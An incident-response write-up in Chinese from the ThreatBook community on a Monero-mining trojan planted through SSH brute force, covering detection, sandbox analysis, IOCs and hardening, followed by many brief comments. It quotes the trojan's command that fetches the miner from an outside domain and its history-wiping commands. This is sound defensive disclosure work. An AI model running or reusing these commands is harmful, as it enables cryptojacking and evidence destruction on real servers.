threatBook匿名用户
IOC 0

threatBookthreatBook

征文
【X社区征文】门罗币挖矿应急响应
匿名用户
2021-11-12 17:59:53ThreatBook764

一、 事件概要

11月1日9点21分,运维同事反馈位于机房的一台发布服务器(生产环境)CPU占用异常高(top命令查看)服务访问慢,影响公司应用版本发布卡。周末自行清理,今天早上又有。通过定位发现通过外网映射的SSH端口爆破sonar用户1万多次后植入挖矿木马,并通过crontab进行维持。

挖矿币种:门罗币;

二、事件详情

2.1 定位挖矿线索

11月1日早上,运维同事反馈服务器周末卡顿。已自行终止挖矿进程。询问挖矿进程名字为:/var/tmp/.dev/.sarscov3

图片1.png

2.2 定位挖矿程序特征

通过ls -al命令查看该目录发现是由用户sonar创建的,并且时间最早是Oct 8,也就是10月8号,爆发是10.29号。再问询同事周五下午服务器有卡顿他清理了周末又卡了,所以周一上班就反馈到我这边。

查看该目录的修改时间戳,发现最新为10.29日,将.dev目录下所有文件打包出来。在这时出于职业嗅觉是挖矿没跑了。

图片2.png

在Windows机器上打开其中文件,看到了熟悉的套路:rm -rf ~/.bashrc  rm -rf ~/.bash_history,每次挖矿应急都看不到之前的命令记录的原因。

图片3.png

将以上执行文件放入在线杀毒网址微步在线:https://s.threatbook.cn,检测结果如下:

图片4.png

因为比较新没有引擎检测出是挖矿,不过行为签名提示3个高危行为:持久化、网络相关,释放文件:xmrig,看到这里可以下定论了XMRig门罗币。

图片5.png

图片6.1.png

图片7.png

2.3 临时处置

当确定木马存在后,kill掉挖矿进程,同时排查/etc/passwd目录下哪些用户具有登录权限。此时已发现通过sonar用户创建的进程和文件。

手段1:在防火墙上关闭该服务器外网SSH服务,掐断连接。避免后续攻击隐患与权限维持;

手段2:对sonar用户禁止登录,并且与运维同事配合排查是否有添加新用户;

手段3:排查持久化手段定时计划任务、SSH后门、守护进程等。

三、 样本分析

根据微步沙箱的分析,挖矿木马下载URL: wget -q http://dudiito.dev/xmrig --no-check-certificate

持久化操作:sonar用户的crontab

图片8.png

下载后木马文件路径:/var/tmp/.dev目录

图片9.png

包括删除一些临时木马文件,读取系统用户等操作。

四、溯源分析

通过查询/var/log/secure,使用tail -fn222 "Failed password"命令查询10月28日未查询到外网连接失败日志,再查询10月8号日志,发现系统未记录。目前已知是通过sonar用户进入。

五、 IOC

Domain:http://dudiito.dev

IP:136.243.219.97

挖矿下载URL:http://dudiito.dev/xmrig --no-check-certificate

六、加固操作

找到对应木马文件后看木马干了什么内容,就做相反操作

1、 禁止sonar用户登录;

2、 将/var/tmp/.dev目录删除;

3、 删除沙箱分析的多余挖矿残留程序;

4、 清除sonar用户下的crontab(crontab -r);

5、 将22端口不对公网暴露。

展开全部ThreatBook
31

评论

ThreatBook
匿名用户
2021-11-27 13:01:01
threatBook0
给大佬献上评论
zhangsanguo
2021-11-26 15:07:15
threatBook0
66
匿名用户
2021-11-26 13:01:09
threatBook0
评论、点赞、发帖、或者关注我都能涨经验哦,升级快快
Black-Z
2021-11-26 10:40:25
threatBook0
666
匿名用户
2021-11-26 08:48:14
threatBook0
666
匿名用户
2021-11-25 20:25:42
threatBook0
分析的非常好
123121
2021-11-25 17:31:04
threatBook0
6
匿名用户
2021-11-25 16:42:39
threatBook0
6
抢你奶奶假牙
2021-11-25 15:36:31
threatBook0
66
FairyTail
2021-11-25 15:27:01
threatBook0
内部服务器管理,还是走VPN靠谱。也可以部署微步的蜜罐把22端口映射出去,对爆破的地址,在出口安全设备进行封堵
匿名用户
2021-11-25 15:22:41
threatBook0
666
acdman
2021-11-25 14:55:37
threatBook0
66666
东北捂眼祖
2021-11-25 14:36:06
threatBook0
经验+10
匿名用户
2021-11-25 13:01:37
threatBook0
给大佬点赞
匿名用户
2021-11-25 11:01:49
threatBook0
666666
嗯哼_
2021-11-25 08:20:05
threatBook0
66666
zpy49
2021-11-24 16:26:00
threatBook0
666
匿名用户
2021-11-24 14:01:31
threatBook0
6
匿名用户
2021-11-24 13:01:32
threatBook0
升级才是硬道理
captainM
2021-11-24 12:03:44
threatBook0
+10
匿名用户
2021-11-24 11:12:24
threatBook0
+ 10
匿名用户
2021-11-24 11:08:49
threatBook0
66
Black-Z
2021-11-24 11:02:24
threatBook0
666
匿名用户
2021-11-24 10:41:35
threatBook0
12312312
laogao
2021-11-18 14:00:29
threatBook0
封域名 封IP
匿名用户
2021-11-18 13:01:19
threatBook0
升级才是硬道理
匿名用户
2021-11-18 09:31:09
threatBook0
666666
匿名用户
2021-11-18 08:30:21
threatBook0
6
匿名用户
2021-11-17 15:06:08
threatBook0
666
匿名用户
2021-11-17 14:42:37
threatBook0
这分析的很到位了。学习了,很棒。效果很好
微步情报局
官方账号
2021-11-17 14:34:15
threatBook0
收到你的征文投稿~ 超棒超棒!我们也会尽快评定文章并下发奖励~感谢参与。
匿名用户
2021-11-15 13:52:46
threatBook0
+10
匿名用户
2021-11-14 23:39:22
threatBook0
+10
匿名用户
2021-11-14 07:14:28
threatBook0
+10
守护
2021-11-13 21:03:58
threatBook0
带佬,很强
守护
2021-11-13 21:03:50
threatBook0
我真的不是来水的,相信我,我这条评论真的一点水分都没有,满满的含金量~~~~~
喵啦个轩
2021-11-13 15:12:06
threatBook0
666
匿名用户
2021-11-13 14:03:24
threatBook0
6666666666
匿名用户
2021-11-13 11:39:58
threatBook0
666
aimmy
2021-11-13 11:33:58
threatBook0
关注我 经验 +10
匿名用户
2021-11-13 08:31:06
threatBook0
+10
匿名用户
2021-11-12 23:12:22
threatBook1
666
匿名用户
2021-11-13 14:04:56
threatBook
回复@匿名用户6666666666
匿名用户
2021-11-12 21:13:42
threatBook1
6
匿名用户
2021-11-13 14:05:01
threatBook
回复@匿名用户6666666666
匿名用户
2021-11-12 20:17:00
threatBook0
很详细了,22不应该发布的呀。
匿名用户
2021-11-12 19:12:05
threatBook0
666
想要时光机
2021-11-12 18:50:03
threatBook0
可以可以~
已经到底了,没有更多内容了
Copyright © ThreatBook.CN All Rights Reserved.京ICP备15044984号-4 北京微步在线科技有限公司 京公网安备11010802025715号